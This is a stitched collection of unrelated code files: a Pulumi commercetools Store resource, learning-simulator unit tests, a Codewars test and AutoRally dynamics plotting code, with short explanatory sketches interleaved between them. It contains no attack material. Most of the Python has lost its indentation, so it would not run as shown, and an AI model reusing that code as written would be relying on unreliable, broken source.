    def languages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "languages", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="supplyChannels")
    def supply_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set of ResourceIdentifier of Channels with InventorySupply
        """
        return pulumi.get(self, "supply_channels")

    @supply_channels.setter
    def supply_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "supply_channels", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "version", value)


class Store(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
key: Optional[pulumi.Input[str]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Create a Store resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
:param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
:param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
:param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
:param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: StoreArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Store resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param StoreArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(StoreArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
key: Optional[pulumi.Input[str]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = StoreArgs.__new__(StoreArgs)
__props__.__dict__["distribution_channels"] = distribution_channels
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__["key"] = key
__props__.__dict__["languages"] = languages
__props__.__dict__["name"] = name
__props__.__dict__["supply_channels"] = supply_channels
__props__.__dict__["version"] = None
super(Store, __self__).__init__(
'commercetools:index/store:Store',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
key: Optional[pulumi.Input[str]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[int]] = None) -> 'Store':
"""
Get an existing Store resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
:param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
:param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
:param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
:param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _StoreState.__new__(_StoreState)
__props__.__dict__["distribution_channels"] = distribution_channels
__props__.__dict__["key"] = key
__props__.__dict__["languages"] = languages
__props__.__dict__["name"] = name
__props__.__dict__["supply_channels"] = supply_channels
__props__.__dict__["version"] = version
return Store(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="distributionChannels")
def distribution_channels(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Set of ResourceIdentifier to a Channel with ProductDistribution
"""
return pulumi.get(self, "distribution_channels")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def languages(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
[IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
"""
return pulumi.get(self, "languages")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Mapping[str, Any]]:
"""
[LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="supplyChannels")
def supply_channels(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Set of ResourceIdentifier of Channels with InventorySupply
"""
return pulumi.get(self, "supply_channels")
@property
@pulumi.getter
def version(self) -> pulumi.Output[int]:
return pulumi.get(self, "version")
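The `@pulumi.getter(name=...)` decorators above bridge Python snake_case attribute names and the camelCase property names in the provider schema. A minimal sketch of that naming convention (a hypothetical helper, not part of the Pulumi SDK):

```python
def snake_to_camel(name: str) -> str:
    """Convert a snake_case property name (e.g. 'supply_channels')
    to the camelCase form used by the provider ('supplyChannels')."""
    head, *rest = name.split("_")
    return head + "".join(part.capitalize() for part in rest)


print(snake_to_camel("supply_channels"))        # supplyChannels
print(snake_to_camel("distribution_channels"))  # distributionChannels
```

Names without underscores (like `key`) pass through unchanged, which is why those getters need no explicit `name=` argument.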
# File: tests/test_bind_trials.py
# Repos: markusrobertjonsson/lesim2, learningsimulator/learningsimulator (MIT license)

import matplotlib.pyplot as plt
import unittest
from .testutil import run, get_plot_data
class TestNewTrialWithBind(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_wplot(self):
script = '''
n_subjects : 1
mechanism : GA
behaviors : R0, R1, R2
stimulus_elements : S1, S2, reward, reward2
start_v : default:-1
alpha_v : 0.1
alpha_w : 0.1
beta : 1
behavior_cost : R1:1, R2:1, default:0
u : reward:10, default: 0
bind_trials : off
@phase chaining stop:reward=100
NEW_TRIAL S1 | R1: STIMULUS_2 | NEW_TRIAL
STIMULUS_2 S2 | R2: REWARD | NEW_TRIAL
REWARD reward | NEW_TRIAL
@run chaining
xscale: reward
@wplot S1
bind_trials: on
@run chaining
@figure
@wplot S1
'''
script_obj, _ = run(script)
axw = plt.figure(1).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_off = lines[0]
xmin = w_S1_off.get_xdata(True).min(0)
xmax = w_S1_off.get_xdata(True).max(0)
ymin = w_S1_off.get_ydata(True).min(0)
ymax = w_S1_off.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertAlmostEqual(ymax, 8, 2)
axw = plt.figure(2).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_on = lines[0]
xmin = w_S1_on.get_xdata(True).min(0)
xmax = w_S1_on.get_xdata(True).max(0)
ymin = w_S1_on.get_ydata(True).min(0)
ymax = w_S1_on.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertGreater(ymax, 20.0, 1)
self.assertLess(ymax, 30.0, 1)
def test_new_trial_is_help_line(self):
script = '''
n_subjects : 25
mechanism : GA
behaviors : cr,ignore # ur = cr, cr1=cr2
stimulus_elements : us,cs1,cs2,none
start_v : default: 0
alpha_v : cs1->ignore: 0.0, cs2->ignore: 0.0, default: 0.05
# alpha_w : us: 0, none:0, default: 0.05
alpha_w : 0.05
beta : 1
behavior_cost : cr:1, default: 0
u : us:5, default: 0
bind_trials : off
#start_w : 1.42
@phase Both_paired stop: new_trial=10
new_trial | CS1(0.5) | NONE
CS1 cs1 | CS2
CS2 cs2 | US
US us | new_trial
NONE none | new_trial
@phase Only_CS2_US_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),CS2(0.5)
CS1 cs1 | NONE
@phase Only_CS1_CS2_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),US(0.5)
CS2 cs2 | NONE
@run Both_paired runlabel: Both_paired
@run Only_CS2_US_paired runlabel: Only_CS2_US_paired
@run Only_CS1_CS2_paired runlabel: Only_CS1_CS2_paired
@figure
xscale: new_trial
subject: average
runlabel: Both_paired
@wplot us {'label':'us_Both_paired'}
@wplot none {'label':'none_Both_paired'}
runlabel: Only_CS2_US_paired
@wplot us {'label':'us_Only_CS2_US_paired'}
@wplot none {'label':'none_Only_CS2_US_paired'}
runlabel: Only_CS1_CS2_paired
@wplot us {'label':'us_Only_CS1_CS2_paired'}
@wplot none {'label':'none_Only_CS1_CS2_paired'}
@legend
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
zeros = [0] * 9
self.assertEqual(plot_data['us_Both_paired']['y'], zeros)
self.assertEqual(plot_data['none_Both_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS1_CS2_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS1_CS2_paired']['y'], zeros)
# Minimal example of new_trial being help line and xscale:new_trial
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w : 1.4
@phase foo stop: new_trial=4
new_trial | NONE
NONE none | new_trial
@run foo
@figure
xscale: new_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Minimal example of new_trial being help line and xscale:all
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: new_trial=4
new_trial | NONE
NONE none | new_trial
@run foo
@figure
xscale: all
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Add a stimulus to new_trial, and plot will contain one more point
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: new_trial=4
new_trial us | NONE
NONE none | new_trial
@run foo
@figure
xscale: new_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 4)
def test_home_made_bind_off_with_alpha_w(self):
script = '''
n_subjects : 25
mechanism : GA
behaviors : cr,ignore # ur = cr, cr1=cr2
stimulus_elements : us,cs1,cs2,none
start_v : default: 0
alpha_v : cs1->ignore: 0.0, cs2->ignore: 0.0, default: 0.05
alpha_w : us: 0, none:0, default: 0.05
# alpha_w : 0.05
beta : 1
behavior_cost : cr:1, default: 0
u : us:5, default: 0
bind_trials : on
@phase Both_paired stop: new_trial=10
new_trial | CS1(0.5) | NONE
CS1 cs1 | CS2
CS2 cs2 | US
US us | new_trial
NONE none | new_trial
@phase Only_CS2_US_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),CS2(0.5)
CS1 cs1 | NONE
@phase Only_CS1_CS2_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),US(0.5)
CS2 cs2 | NONE
@run Both_paired runlabel: Both_paired
@run Only_CS2_US_paired runlabel: Only_CS2_US_paired
@run Only_CS1_CS2_paired runlabel: Only_CS1_CS2_paired
@figure
xscale: new_trial
subject: average
runlabel: Both_paired
@wplot us {'label':'us_Both_paired'}
@wplot none {'label':'none_Both_paired'}
runlabel: Only_CS2_US_paired
@wplot us {'label':'us_Only_CS2_US_paired'}
@wplot none {'label':'none_Only_CS2_US_paired'}
runlabel: Only_CS1_CS2_paired
@wplot us {'label':'us_Only_CS1_CS2_paired'}
@wplot none {'label':'none_Only_CS1_CS2_paired'}
@legend
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
zeros = [0] * 9
self.assertEqual(plot_data['us_Both_paired']['y'], zeros)
self.assertEqual(plot_data['none_Both_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS1_CS2_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS1_CS2_paired']['y'], zeros)
class TestNewTrialWithOmitLearnAction(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_wplot(self):
script = '''
n_subjects : 1
mechanism : GA
behaviors : R0, R1, R2
stimulus_elements : S1, S2, reward, reward2
start_v : default:-1
alpha_v : 0.1
alpha_w : 0.1
beta : 1
behavior_cost : R1:1, R2:1, default:0
u : reward:10, default: 0
@phase bind_off stop:reward=100
NJU_TRIAL S1 | R1: STIMULUS_2 | @omit_learn, NJU_TRIAL
STIMULUS_2 S2 | R2: REWARD | @omit_learn, NJU_TRIAL
REWARD reward | @omit_learn, NJU_TRIAL
@phase bind_on stop:reward=100
NJU_TRIAL S1 | R1: STIMULUS_2 | NJU_TRIAL
STIMULUS_2 S2 | R2: REWARD | NJU_TRIAL
REWARD reward | NJU_TRIAL
@run bind_off
xscale: reward
@wplot S1
@run bind_on
@figure
@wplot S1
'''
script_obj, _ = run(script)
axw = plt.figure(1).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_off = lines[0]
xmin = w_S1_off.get_xdata(True).min(0)
xmax = w_S1_off.get_xdata(True).max(0)
ymin = w_S1_off.get_ydata(True).min(0)
ymax = w_S1_off.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertAlmostEqual(ymax, 8, 2)
axw = plt.figure(2).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_on = lines[0]
xmin = w_S1_on.get_xdata(True).min(0)
xmax = w_S1_on.get_xdata(True).max(0)
ymin = w_S1_on.get_ydata(True).min(0)
ymax = w_S1_on.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertGreater(ymax, 20.0, 1)
self.assertLess(ymax, 30.0, 1)
def test_new_trial_is_help_line(self):
script = '''
n_subjects : 25
mechanism : GA
behaviors : cr,ignore # ur = cr, cr1=cr2
stimulus_elements : us,cs1,cs2,none
start_v : default: 0
alpha_v : cs1->ignore: 0.0, cs2->ignore: 0.0, default: 0.05
# alpha_w : us: 0, none:0, default: 0.05
alpha_w : 0.05
beta : 1
behavior_cost : cr:1, default: 0
u : us:5, default: 0
#start_w : 1.42
@phase Both_paired stop: nju_trial=10
nju_trial | CS1(0.5) | NONE
CS1 cs1 | CS2
CS2 cs2 | US
US us | @omit_learn, nju_trial
NONE none | @omit_learn, nju_trial
@phase Only_CS2_US_paired(Both_paired) stop: nju_trial=10
nju_trial | CS1(0.5),CS2(0.5)
CS1 cs1 | NONE
@phase Only_CS1_CS2_paired(Both_paired) stop: nju_trial=10
nju_trial | CS1(0.5),US(0.5)
CS2 cs2 | NONE
@run Both_paired runlabel: Both_paired
@run Only_CS2_US_paired runlabel: Only_CS2_US_paired
@run Only_CS1_CS2_paired runlabel: Only_CS1_CS2_paired
@figure
xscale: nju_trial
subject: average
runlabel: Both_paired
@wplot us {'label':'us_Both_paired'}
@wplot none {'label':'none_Both_paired'}
runlabel: Only_CS2_US_paired
@wplot us {'label':'us_Only_CS2_US_paired'}
@wplot none {'label':'none_Only_CS2_US_paired'}
runlabel: Only_CS1_CS2_paired
@wplot us {'label':'us_Only_CS1_CS2_paired'}
@wplot none {'label':'none_Only_CS1_CS2_paired'}
@legend
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
zeros = [0] * 9
self.assertEqual(plot_data['us_Both_paired']['y'], zeros)
self.assertEqual(plot_data['none_Both_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS1_CS2_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS1_CS2_paired']['y'], zeros)
# Minimal example of new_trial being help line and xscale:new_trial
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w : 1.4
@phase foo stop: nju_trial=4
nju_trial | NONE
NONE none | nju_trial
@run foo
@figure
xscale: nju_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Minimal example of new_trial being help line and xscale:all
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: nju_trial=4
nju_trial | NONE
NONE none | nju_trial
@run foo
@figure
xscale: all
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Add a stimulus to new_trial, and plot will contain one more point
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: nju_trial=4
nju_trial us | NONE
NONE none | nju_trial
@run foo
@figure
xscale: nju_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 4)
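The `test_wplot` assertions above pull rendered data back out of matplotlib figures via `get_lines`/`get_xdata`/`get_ydata`. The same inspection pattern in isolation, using the non-interactive Agg backend (values here are arbitrary):

```python
import matplotlib
matplotlib.use("Agg")  # headless backend; no display needed
import matplotlib.pyplot as plt
import numpy as np

fig, ax = plt.subplots()
ax.plot(np.array([0.0, 1.0, 2.0]), np.array([1.4, 1.4, 1.4]), label="w(us)")

(line,) = ax.get_lines()       # one Line2D per plotted series
xdata = line.get_xdata(True)   # True returns the original (unprocessed) data
ydata = line.get_ydata(True)
print(xdata.min(0), xdata.max(0))  # 0.0 2.0
print(ydata.tolist())              # [1.4, 1.4, 1.4]
plt.close(fig)
```

Passing `True` to `get_xdata`/`get_ydata` returns the data exactly as it was handed to `plot`, which is what the tests above rely on when checking axis ranges.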
# File: Codewars/7kyu/mumbling/Python/test.py
# Repo: RevansChen/online-judge (MIT license)

# Python - 3.6.0
Test.describe('accum')
Test.it('Basic tests')
Test.assert_equals(accum('ZpglnRxqenU'), 'Z-Pp-Ggg-Llll-Nnnnn-Rrrrrr-Xxxxxxx-Qqqqqqqq-Eeeeeeeee-Nnnnnnnnnn-Uuuuuuuuuuu')
Test.assert_equals(accum('NyffsGeyylB'), 'N-Yy-Fff-Ffff-Sssss-Gggggg-Eeeeeee-Yyyyyyyy-Yyyyyyyyy-Llllllllll-Bbbbbbbbbbb')
Test.assert_equals(accum('MjtkuBovqrU'), 'M-Jj-Ttt-Kkkk-Uuuuu-Bbbbbb-Ooooooo-Vvvvvvvv-Qqqqqqqqq-Rrrrrrrrrr-Uuuuuuuuuuu')
Test.assert_equals(accum('EvidjUnokmM'), 'E-Vv-Iii-Dddd-Jjjjj-Uuuuuu-Nnnnnnn-Oooooooo-Kkkkkkkkk-Mmmmmmmmmm-Mmmmmmmmmmm')
Test.assert_equals(accum('HbideVbxncC'), 'H-Bb-Iii-Dddd-Eeeee-Vvvvvv-Bbbbbbb-Xxxxxxxx-Nnnnnnnnn-Cccccccccc-Ccccccccccc')
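The assertions above exercise an `accum` function defined elsewhere in the kata submission. One candidate implementation that satisfies them (my sketch, not part of this test file):

```python
def accum(s):
    # 'abcd' -> 'A-Bb-Ccc-Dddd': the i-th letter is repeated i+1 times,
    # capitalized, and the groups are joined with '-'
    return '-'.join((c * (i + 1)).capitalize() for i, c in enumerate(s))


print(accum('ZpglnRxqenU'))
# Z-Pp-Ggg-Llll-Nnnnn-Rrrrrr-Xxxxxxx-Qqqqqqqq-Eeeeeeeee-Nnnnnnnnnn-Uuuuuuuuuuu
```

`str.capitalize` conveniently uppercases the first character and lowercases the rest, so mixed-case inputs like `'ZpglnRxqenU'` normalize correctly.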
# File: neural_clbf/systems/tests/test_autorally.py
# Repo: MIT-REALM/neural_clbf (BSD-3-Clause license)

"""Test the AutoRally vehicle dynamics"""
from copy import copy
import matplotlib.pyplot as plt
import tqdm
import numpy as np
import torch
from neural_clbf.systems import AutoRally
def test_autorally_init():
"""Test initialization of AutoRally model"""
# Test instantiation with valid parameters
valid_params = {
"psi_ref": 1.0,
"v_ref": 1.0,
"omega_ref": 0.0,
}
arcar = AutoRally(valid_params)
assert arcar is not None
assert arcar.n_dims == 9
assert arcar.n_controls == 2
def plot_autorally_straight_path():
"""Test the dynamics of the kinematic car tracking a straight path"""
# Create the system
params = {
"psi_ref": 0.5,
"v_ref": 10.0,
"omega_ref": 0.0,
}
dt = 0.001
arcar = AutoRally(params, dt)
upper_u_lim, lower_u_lim = arcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 10.0
n_sims = 1
controller_period = 0.01
num_timesteps = int(t_sim // dt)
start_x = arcar.goal_point.clone()
start_x[:, AutoRally.SYE] = 1.0
start_x[:, AutoRally.SXE] = -1.0
x_sim = torch.zeros(num_timesteps, n_sims, arcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, arcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = arcar.u_nominal(x_current)
for dim_idx in range(arcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = arcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
psi_ref = params["psi_ref"]
x_ref = t * params["v_ref"] * np.cos(psi_ref)
y_ref = t * params["v_ref"] * np.sin(psi_ref)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, arcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, arcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax1.set_ylim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_xlim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_aspect("equal")
# psi_err_path = x_sim[:, :, arcar.PSI_E].cpu().squeeze().numpy()
# delta_path = x_sim[:, :, arcar.DELTA].cpu().squeeze().numpy()
# v_err_path = x_sim[:, :, arcar.VE].cpu().squeeze().numpy()
# ax1.plot(t[:t_final], y_err_path[:t_final])
# ax1.plot(t[:t_final], x_err_path[:t_final])
# ax1.plot(t[:t_final], psi_err_path[:t_final])
# ax1.plot(t[:t_final], delta_path[:t_final])
# ax1.plot(t[:t_final], v_err_path[:t_final])
# ax1.legend(["y", "x", "psi", "delta", "ve"])
ax2 = axs[1]
plot_u_indices = [arcar.VDELTA, arcar.OMEGA_R_DOT]
plot_u_labels = ["$v_\\delta$", r"$\dot{\omega}_r$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
# x_sim[:t_final, :, :AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
x_sim[:t_final, :, :4].squeeze(),
# label="Tracking Error x-y-psi",
label=[
"SXE",
"SYE",
"PSI_E",
"DELTA",
],
)
ax3.plot(
t[:t_final],
# x_sim[:t_final, :, :AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
x_sim[:t_final, :, 7:].squeeze(),
# label="Tracking Error x-y-psi",
label=[
"VY",
"PSI_E_DOT",
],
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
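The simulation loop above saturates each control dimension against its own limits with `torch.clamp`. The same idea with NumPy, as a standalone sketch (the limits below are arbitrary, not the AutoRally ones):

```python
import numpy as np

def clamp_controls(u, lower, upper):
    """Clip each control dimension of u (n_sims x n_controls) to its own limits."""
    u = u.copy()
    for dim_idx in range(u.shape[1]):
        u[:, dim_idx] = np.clip(u[:, dim_idx], lower[dim_idx], upper[dim_idx])
    return u

u = np.array([[2.0, -5.0], [0.1, 0.3]])
lower = np.array([-1.0, -0.5])
upper = np.array([1.0, 0.5])
print(clamp_controls(u, lower, upper))  # [[ 1.  -0.5], [ 0.1  0.3]]
```

Since `np.clip` broadcasts per-column bounds, the loop could also be replaced by a single `np.clip(u, lower, upper)`; the per-dimension loop here mirrors the structure of the torch code above.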
def plot_autorally_circle_path():
"""Test the dynamics of the kinematic car tracking a circle path"""
# Create the system
params = {
"psi_ref": 1.0,
"v_ref": 10.0,
"omega_ref": 0.5,
}
dt = 0.01
arcar = AutoRally(params, dt)
upper_u_lim, lower_u_lim = arcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 20.0
n_sims = 1
controller_period = dt
num_timesteps = int(t_sim // dt)
start_x = arcar.goal_point.clone()
start_x[:, AutoRally.SYE] = 1.0
start_x[:, AutoRally.SXE] = -1.0
x_sim = torch.zeros(num_timesteps, n_sims, arcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, arcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
# And create a place to store the reference path
x_ref = np.zeros(num_timesteps)
y_ref = np.zeros(num_timesteps)
psi_ref = np.zeros(num_timesteps)
psi_ref[0] = 1.0
# Simulate!
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = arcar.u_nominal(x_current)
for dim_idx in range(arcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Get the path parameters at this point
psi_ref[tstep] = dt * params["omega_ref"] + psi_ref[tstep - 1]
pt = copy(params)
pt["psi_ref"] = psi_ref[tstep]
x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = arcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
pt,
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
# Convert trajectory from path-centric to world coordinates
